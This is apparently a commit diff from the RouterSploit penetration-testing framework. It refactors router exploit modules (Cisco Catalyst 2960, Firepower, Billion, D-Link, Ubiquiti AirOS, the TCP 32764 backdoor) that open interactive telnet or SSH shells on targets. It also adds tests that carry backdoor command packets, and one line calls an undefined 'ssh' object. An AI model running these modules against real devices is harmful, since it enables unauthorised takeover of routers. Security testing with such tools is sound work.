Fixing multiple modules (#513)

routersploit/modules/exploits/routers/billion/billion_5200w_rce.py

@@ -44,10 +44,10 @@ class Exploit(HTTPClient, TelnetClient):
         if self.execute1(cmd) or self.execute2(cmd):
             print_status("Trying to connect to the telnet server...")
 
-            telnet_client = self.telnet_connect(port=self.telnet_port)
-            if telnet_client:
-                self.telnet_interactive(telnet_client)
-                self.telnet_close(telnet_client)
+            telnet_client = self.telnet_create(port=self.telnet_port)
+            if telnet_client.connect():
+                telnet_client.interactive()
+                telnet_client.close()
             else:
                 print_error("Exploit failed - Telnet connection error: {}:{}".format(self.target, self.telnet_port))
         else:

routersploit/modules/exploits/routers/cisco/catalyst_2960_rocem.py

@@ -161,7 +161,7 @@ class Exploit(TCPClient, TelnetClient):
         ]
 
     def run(self):
-        if self.device < 0 or self.device >= len(self.payloads):
+        if int(self.device) < 0 or int(self.device) >= len(self.payloads):
             print_error("Set target device - use \"show devices\" and \"set device <id>\"")
             return
 
@@ -169,11 +169,11 @@ class Exploit(TCPClient, TelnetClient):
             print_error("Specify action: set / unset credless authentication for Telnet service")
             return
 
-        print_status("Trying to connect to Telnet service on port {}".format(self.telnet_port))
+        print_status("Trying to connect to Telnet service on port {}".format(self.port))
 
-        tcp_client = self.tcp_connect()
-        if tcp_client:
-            response = self.tcp_recv(tcp_client, 1024)
+        tcp_client = self.tcp_create()
+        if tcp_client.connect():
+            response = tcp_client.recv(1024)
             print_status("Connection OK")
             print_status("Received bytes from telnet service: {}".format(repr(response)))
         else:
@@ -183,22 +183,22 @@ class Exploit(TCPClient, TelnetClient):
         print_status("Building payload...")
         payload = self.build_payload()
 
-        if self.action == 'set':
+        if self.action == "set":
             print_status("Setting credless privilege 15 authentication")
         else:
             print_status("Unsetting credless privilege 15 authentication")
 
         print_status("Sending cluster option")
-        self.tcp_send(tcp_client, payload)
-        self.tcp_close(tcp_client)
+        tcp_client.send(payload)
+        tcp_client.close()
 
         print_status("Payload sent")
 
-        if self.action == 'set':
+        if self.action == "set":
             print_status("Connecting to Telnet service...")
-            telnet_client = self.telnet_connect()
-            if telnet_client:
-                self.telnet_interactive(telnet_client)
+            telnet_client = self.telnet_create()
+            if telnet_client.connect():
+                telnet_client.interactive()
             else:
                 print_error("Exploit failed")
         else:

routersploit/modules/exploits/routers/cisco/firepower_management60_rce.py

@@ -66,7 +66,8 @@ class Exploit(HTTPClient, SSHClient):
         )
 
         if response is not None and response.status_code == 200:
-            if self.ssh_test_connect(port=self.ssh_port):
+            ssh_client = self.ssh_create(port=self.ssh_port)
+            if ssh_client.test_connect():
                 return True  # target is vulnerable
 
         return False  # target is not vulnerable
@@ -144,7 +145,7 @@ class Exploit(HTTPClient, SSHClient):
 
     def init_ssh_session(self, username, password):
         print_status("Trying to authenticate through SSH with username: {} password:{} account".format(username, password))
-        ssh_client = self.ssh_login(username, password)
-        if ssh_client:
+        ssh_client = self.ssh_create()
+        if ssh_client.login(username, password):
             print_success("SSH - Successful authentication")
-            ssh_interactive(ssh_client)
+            ssh_client.interactive()

routersploit/modules/exploits/routers/dlink/dir_815_850l_rce.py

@@ -41,8 +41,8 @@ class Exploit(UDPClient):
         request = bytes(request, "utf-8")
 
         udp_client = self.udp_create()
-        self.udp_send(udp_client, request)
-        self.udp_close(udp_client)
+        udp_client.send(request)
+        udp_client.close()
 
         return ""
 

routersploit/modules/exploits/routers/multi/tcp_32764_rce.py

@@ -67,13 +67,13 @@ class Exploit(TCPClient):
 
         tcp_client = self.tcp_create()
         if tcp_client.connect():
-            tcp_client.tcp_send(payload)
+            tcp_client.send(payload)
             response = tcp_client.recv(0xC)
 
             sig, ret_val, ret_len = struct.unpack(self.endianness + "III", response)
             response = tcp_client.recv(ret_len)
 
-            tcp_client.tcp_close()
+            tcp_client.close()
 
             if response:
                 return str(response, "utf-8")

routersploit/modules/exploits/routers/ubiquiti/airos_6_x.py

@@ -59,8 +59,9 @@ class Exploit(HTTPClient, SSHClient):
             print_success("Appareantly the exploit worked fine")
             print_success("Trying to invoke a interactive SSH Shell")
 
-            ssh_client = self.ssh_login_pkey("ubnt", private_key.getvalue())
-            self.ssh_interactive(ssh_client)
+            ssh_client = self.ssh_create()
+            if ssh_client.login_pkey("ubnt", private_key.getvalue()):
+                ssh.interactive()
 
         else:
             print_error("Exploit failed - target is not vulnerable")

tests/exploits/routers/multi/test_tcp_32764_rce.py

@@ -6,8 +6,11 @@ from routersploit.modules.exploits.routers.multi.tcp_32764_rce import Exploit
 def test_check_success1(mocked_shell, tcp_target):
     """ Test scenario - successful check Big Endian"""
 
-    command_mock = tcp_target.get_command_mock(b"ABCDE")
-    command_mock.return_value = b"MMcS"
+    command_mock1 = tcp_target.get_command_mock(b"ABCDE")
+    command_mock1.return_value = b"MMcS"
+
+    command_mock2 = tcp_target.get_command_mock(b"ScMM\x00\x00\x00\x07\x00\x00\x00.echo e6055cd8c31bf64cfbed8e3247bd11d5c1277c13\x00")
+    command_mock2.return_value = b"\x41\x41\x41\x41" + b"\x29\x00\x00\x00" + b"\x42\x42\x42\x42" + b"e6055cd8c31bf64cfbed8e3247bd11d5c1277c13\x00"
 
     exploit = Exploit()
     exploit.target = tcp_target.host
@@ -15,6 +18,7 @@ def test_check_success1(mocked_shell, tcp_target):
 
     assert exploit.check()
     assert exploit.run() is None
+    assert exploit.execute("echo e6055cd8c31bf64cfbed8e3247bd11d5c1277c13") == "e6055cd8c31bf64cfbed8e3247bd11d5c1277c13\x00"
 
 
 @mock.patch("routersploit.modules.exploits.routers.multi.tcp_32764_rce.shell")
@@ -24,9 +28,13 @@ def test_check_success2(mocked_shell, tcp_target):
     command_mock = tcp_target.get_command_mock(b"ABCDE")
     command_mock.return_value = b"ScMM"
 
+    command_mock2 = tcp_target.get_command_mock(b"MMcS\x07\x00\x00\x00.\x00\x00\x00echo e6055cd8c31bf64cfbed8e3247bd11d5c1277c13\x00")
+    command_mock2.return_value = b"\x41\x41\x41\x41" + b"\x00\x00\x00\x29" + b"\x42\x42\x42\x42" + b"e6055cd8c31bf64cfbed8e3247bd11d5c1277c13\x00"
+
     exploit = Exploit()
     exploit.target = tcp_target.host
     exploit.port = tcp_target.port
 
     assert exploit.check()
     assert exploit.run() is None
+    assert exploit.execute("echo e6055cd8c31bf64cfbed8e3247bd11d5c1277c13") == "e6055cd8c31bf64cfbed8e3247bd11d5c1277c13\x00"